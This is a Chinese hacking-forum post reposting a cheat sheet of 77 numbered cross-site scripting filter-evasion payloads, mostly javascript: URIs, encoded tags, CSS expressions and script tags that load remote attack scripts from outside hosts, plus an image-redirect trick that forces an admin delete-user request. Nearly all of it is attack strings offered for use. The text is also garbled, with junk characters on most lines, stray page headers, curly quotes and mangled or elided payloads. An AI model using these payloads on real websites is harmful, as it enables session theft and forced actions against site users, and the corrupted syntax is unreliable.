貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。8 P l+ A6 m9 f6 }7 Z# [" w
(1)普通的XSS JavaScript注入
" w: S( v8 _" R7 {% z* i- v7 g1 E<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># ]) Y% @& O+ I' W9 `4 F0 b* `+ N4 q
(2)IMG标签XSS使用JavaScript命令
& _; G1 _1 p4 o, T<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ q' g" H( j7 m. [9 V: ^(3)IMG标签无分号无引号2 k% `6 M; f; p+ I2 ]
<IMG SRC=javascript:alert(‘XSS’)>: J1 { D; H" i8 {% r
(4)IMG标签大小写不敏感5 X* K2 B+ s( R
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>. r+ w5 Q3 r) y* R. y8 p& [
(5)HTML编码(必须有分号)5 B6 W. }4 {, x& w" A: C
<IMG SRC=javascript:alert(“XSS”)> E& P- @1 j( k" h, p
(6)修正缺陷IMG标签
' z3 X) E; V1 U<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' J* n; c- n$ K) D
' p7 B3 g; l+ X
& N7 U; A# u) p3 P2 q1 }- g(7)formCharCode标签(计算器)0 l6 s3 B+ p( O; v4 N5 ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# i5 J% K, V/ v% P(8)UTF-8的Unicode编码(计算器)
+ Z q7 U" f, }: }5 |0 I. p' s<IMG SRC=jav..省略..S')>
) B) E6 X9 c% f" a: W(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: Q/ R1 w- A2 ` R5 q<IMG SRC=jav..省略..S')>
0 n1 A; L, d# P(10)十六进制编码也是没有分号(计算器)/ W' R( J9 D, b. c/ V. S: l4 [6 j
<IMG SRC=java..省略..XSS')>/ v) \. I1 U2 ~5 X5 H
(11)嵌入式标签,将Javascript分开
d/ J3 [* Q" g2 J5 V, }<IMG SRC=”jav ascript:alert(‘XSS’);”>
' e E4 o5 O- Z0 i ?& ]: k(12)嵌入式编码标签,将Javascript分开 W9 X* {; X+ T. U5 @ M; h5 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 B1 c2 \8 z9 p) P6 c( v {(13)嵌入式换行符
/ m' e# t: |! z: j<IMG SRC=”jav ascript:alert(‘XSS’);”>
. Y# F3 c4 N* P; b(14)嵌入式回车
7 |; Y9 j% g8 h1 d+ m<IMG SRC=”jav ascript:alert(‘XSS’);”>* q$ n* _) o' X! O
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 ]& V$ N' D! t7 h$ ~6 `<IMG SRC=”javascript:alert(‘XSS‘)”>0 y) o! \) \, g( N2 f( m6 c4 o' c
(16)解决限制字符(要求同页面)$ f9 R* R0 D$ G; e
<script>z=’document.’</script>
- k! b2 L$ x/ a, b<script>z=z+’write(“‘</script>
3 j5 F; _! ?" h3 b# X<script>z=z+’<script’</script>( ^8 M5 W4 Y& N+ Z9 H# z7 C1 v. ~
<script>z=z+’ src=ht’</script>
, j) A: u* p7 x& v: ]3 F& t4 @<script>z=z+’tp://ww’</script>7 \& x& W _# a+ V# A+ s* F
<script>z=z+’w.shell’</script>! _1 \: I3 E0 ^/ q# d
<script>z=z+’.net/1.’</script># m' q) ]0 ?( k. D: x
<script>z=z+’js></sc’</script>; j, s5 h! a: a0 H) B- g* G" c+ F% n
<script>z=z+’ript>”)’</script>6 l/ N& x" o3 x
<script>eval_r(z)</script>' _- |' A; s, a* _0 I3 g" a; v1 J/ V
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: m/ `# Z, S# s* f1 f) R# R6 v9 dhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
$ a: S5 ~2 ]1 u; A" H4 D$ Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 d1 h% R% ~7 `(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用! [4 o/ B! P( w+ _3 K, H
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 Y" X+ S4 }' y# {1 F2 R
(19)Spaces和meta前的IMG标签* i" C- N. ?- V- ?7 r" a: O
<IMG SRC=” javascript:alert(‘XSS’);”>7 ?. g: G. h+ z% n
(20)Non-alpha-non-digit XSS1 ~$ h# k% s7 n5 [9 o4 y( E P0 B0 ?
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 j: w9 @ L) [, ]/ G, A(21)Non-alpha-non-digit XSS to 24 h7 a3 [/ z2 F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
7 S" ?5 w% o& G: M5 L(22)Non-alpha-non-digit XSS to 3
- M6 v S5 Z- [$ m6 F6 a+ ?<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># J* r- _1 c- W: J d1 W
(23)双开括号
! c9 a* q9 d8 i# ?! B. t) @' F<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; \) Q& Z8 F+ i7 w) ^9 L$ o# X8 f6 E(24)无结束脚本标记(仅火狐等浏览器)2 a. @. t9 ~2 m0 `3 |7 Z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; \+ L, w2 m% O( r0 i9 Y. F(25)无结束脚本标记2
) g7 X% C3 M0 a( h, |) j) {% X9 p<SCRIPT SRC=//3w.org/XSS/xss.js>$ s4 C2 G, ?+ L2 |
(26)半开的HTML/JavaScript XSS
. ~0 j) E3 M* W, e) D<IMG SRC=”javascript:alert(‘XSS’)”/ D0 d# j1 l: Q; n; Q; q& _
(27)双开角括号$ D4 _0 c7 o( H
<iframe src=http://3w.org/XSS.html <& B- d% G) x0 G4 _
(28)无单引号 双引号 分号5 y% }5 \6 n( C* n3 j2 S0 ^
<SCRIPT>a=/XSS/
& \& Y. i( H7 Dalert(a.source)</SCRIPT>- {# a8 V! l U" y) o" p$ Y
(29)换码过滤的JavaScript; y8 e' Q0 P1 }) o
\”;alert(‘XSS’);//
) M' K( {6 K8 o% L; f1 ~; a9 L(30)结束Title标签5 j7 ?, E( P6 E o* R, W
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; J) d6 h8 o1 ?, j* I( W; b(31)Input Image
9 s% N7 _% p: I7 T& `% _<INPUT SRC=”javascript:alert(‘XSS’);”>
5 i5 }* X6 x }% ~3 g0 O(32)BODY Image
+ D( V! I) [" W0 u$ X' T+ ^- `<BODY BACKGROUND=”javascript:alert(‘XSS’)”>3 l# S9 r8 }7 ?+ F1 s
(33)BODY标签
' {* e! F* l# T! L<BODY(‘XSS’)>
* Z/ P# I, D$ l( a6 ^( z(34)IMG Dynsrc- b, _1 f: a& ^. K" \1 D
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 \9 K4 x" B0 R0 A+ p" n
(35)IMG Lowsrc4 `5 _* Y# k0 B$ j2 P: Q9 Y
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
" g/ u$ Z; l) L+ C+ s5 [: Q! v9 O(36)BGSOUND
* y) t7 @7 z7 |7 D, [4 J/ k<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 F7 A, H7 ~- `. q% R$ @# M
(37)STYLE sheet& x: ? B% g" {
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- F# i8 a" T& E' J- w/ N$ ~( R(38)远程样式表8 o* E- p% N4 A5 H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& `1 e" H ?. p- v* G4 {. t6 n$ P+ `
(39)List-style-image(列表式)
9 F9 C* N8 p* E4 c* i0 E; x<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# \2 ^# l" k& M8 q; X(40)IMG VBscript
) T5 ~# [/ N: D2 G/ u* a9 g, I. N<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
0 \" s4 A2 ~$ J0 m; N) R& O* X6 v* X(41)META链接url% V. H9 Z, H+ v/ e
8 ?) U1 b7 D9 {2 C6 g4 q* \. j0 ?/ |: h6 Q6 i- d2 J- P. y
<META HTTP-EQUIV=”refresh” CONTENT=”0;
! Z- j/ d+ v8 P4 c4 u' `8 UURL=http://;URL=javascript:alert(‘XSS’);”>+ }( d! A, X9 ? g8 o) `
(42)Iframe- S3 K8 i {3 I6 _
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. z& [' f. C: q9 t) ^
(43)Frame
0 U" l3 f$ X6 b. x6 M+ N<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board/ W( _7 T8 W/ h# V8 l4 j8 {6 @
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
& D" e, Y* P) W* s, ?(44)Table, i) V2 E% M: c5 M8 V
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 t* v8 N" B9 \- I+ M; p
(45)TD
5 c* Z: L- n1 P# W2 x |<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 V; b) i1 V% j9 m
(46)DIV background-image
3 x0 y# t0 |2 F9 k4 a' r2 e- G; r<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 g/ r( M, l5 `+ i8 B) l" W
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-5 S3 T0 G% e7 @+ @( R1 m
8&13&12288&65279)2 p4 p- {2 Z+ F( P, I& y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 ?% ~2 p t8 B4 q! p(48)DIV expression( O/ @/ `4 ~& m: g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
! c& W; u* o0 h5 S1 L f(49)STYLE属性分拆表达/ t* ]8 k* N8 Z' ]- p9 J, H' z9 V
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 D+ L1 C' |, x* O; B$ W' ^! u! Y0 o
(50)匿名STYLE(组成:开角号和一个字母开头)
" B0 W* x& |- u# o S<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" L" U& b& T" T& d* @$ I, Z(51)STYLE background-image
. V" x( e0 ^. z9 v<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A7 w) B, b5 H4 T. j
CLASS=XSS></A>
8 M/ f8 e0 w. g: K3 r5 `(52)IMG STYLE方式
]. P* W$ K. Y9 O, r) y% V# nexppression(alert(“XSS”))’>
- j/ f, g1 y2 F) ~- _ I: \: ?2 r3 G(53)STYLE background% J4 C& q" Z0 K: x$ y$ E& ? v: M
<STYLE><STYLE
" f% Q* k* g3 O7 P Wtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" k% e9 p* N% [- X b& ~
(54)BASE$ g" k4 O" Q/ k' z
<BASE HREF=”javascript:alert(‘XSS’);//”>
) W# l* R+ ^! C3 |6 E1 Y(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: {5 x' ~' m' A9 n% i$ D
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, G- K5 H9 q, O(56)在flash中使用ActionScrpt可以混进你XSS的代码4 ~& i7 `3 r/ d. e" j) y
a=”get”;
1 M7 @* p+ X/ K5 H0 R& i4 Fb=”URL(\”";
% w- }* O1 ?- } b6 W6 ?c=”javascript:”;9 \# x7 G& h z; X4 G* J
d=”alert(‘XSS’);\”)”;
. U2 x# r! Q9 Ueval_r(a+b+c+d);
( {$ H. W: W0 l* R1 E# [(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ M o9 H0 B |1 J<HTML xmlns:xss>: d+ c7 ^- L% @9 u) K/ A
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 j. k5 z a. n" q- D& Y
<xss:xss>XSS</xss:xss>2 k0 S Y2 |+ @
</HTML>; r' b! f1 {- e+ V1 m, h! R4 W: Q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
H% g: O. @/ M<SCRIPT SRC=””></SCRIPT>7 T! P$ K7 [0 b( d9 G/ A
(59)IMG嵌入式命令,可执行任意命令3 W$ i' Z6 v/ h, l; ?, Y
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
9 U$ H, j: p* M/ v(60)IMG嵌入式命令(a.jpg在同服务器)* h Z0 s+ @6 k: N( u8 D, B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 p2 T4 C8 I% i# v4 j& V
(61)绕符号过滤 ] [! r0 z8 N
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>" X2 q/ x% F o! m5 y `; g
(62)
2 M [; L8 ?( C: s<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ V. s: L. O# P+ r(63)8 ^; Q) y" R; B+ G
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 X: Q4 ?& q2 g5 B" U
(64)2 n2 _! R" a' u. e2 Z( v/ v$ t# b
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
$ U/ o4 e2 R% r& n9 y(65)
& {3 H. `6 \1 H0 [) R<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
: I3 G! q) k$ R+ X(66)12-7-1 T00LS - Powered by Discuz! Board
! r' R0 Z- \+ B0 X( b( Shttps://www.t00ls.net/viewthread ... table&tid=15267 4/67 S* ~5 X: p' o
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% _; u& [2 p: F4 G! l( U; Y
(67); u- x9 T u/ R5 t9 ?! h9 r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>. i# p5 |8 ?1 X- m1 w3 g, q
</SCRIPT>* ^8 J/ ^6 a7 x$ G3 G
(68)URL绕行
/ |: T( q6 o9 i' U2 ^<A HREF=”http://127.0.0.1/”>XSS</A>
9 ~ E. k/ ?/ g0 j3 A(69)URL编码
3 I4 B: j% {/ K' ?& \<A HREF=”http://3w.org”>XSS</A>: e) w. T% |: H- W N$ o
(70)IP十进制3 ^# k4 v+ E3 h B
<A HREF=”http://3232235521″>XSS</A>
) F3 Z/ o! y3 h4 M( P% u(71)IP十六进制
Z) X2 ~8 \# A% g. V: r<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" R/ l' Q$ A" d0 Z: h(72)IP八进制
' S# R+ u* ^: m- R5 K: A7 l<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 \ D9 `6 g! U7 {(73)混合编码8 S+ G" W+ k2 ]
<A HREF=”h9 n! n9 ~3 q5 V l; P
tt p://6 6.000146.0×7.147/”">XSS</A># S4 o. `9 X' ?7 R8 a( H
(74)节省[http:]
# l# }$ P* I: u8 e! e4 I: X<A HREF=”//www.google.com/”>XSS</A>* u7 Y( v: j: G, @7 [" z
(75)节省[www]' A4 d) m( S& Q, V) c
<A HREF=”http://google.com/”>XSS</A>
7 f9 Q* Q& Z/ t# \9 {9 m/ s(76)绝对点绝对DNS
9 p5 x3 ^6 a3 L. A4 Y v<A HREF=”http://www.google.com./”>XSS</A>' T! V0 @$ m+ Z1 [
(77)javascript链接
- [! F( V% l F: G4 Q9 }<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>; C6 `8 X1 {# r6 z, z
/ \7 ~# ]% h$ M T& h原文地址:http://fuzzexp.org/u/0day/?p=14
. w0 Z3 J0 H8 P. g$ s# {& u0 L) P) P2 v9 g
|
发表于 2013-4-19 19:22:37
收藏
支持
反对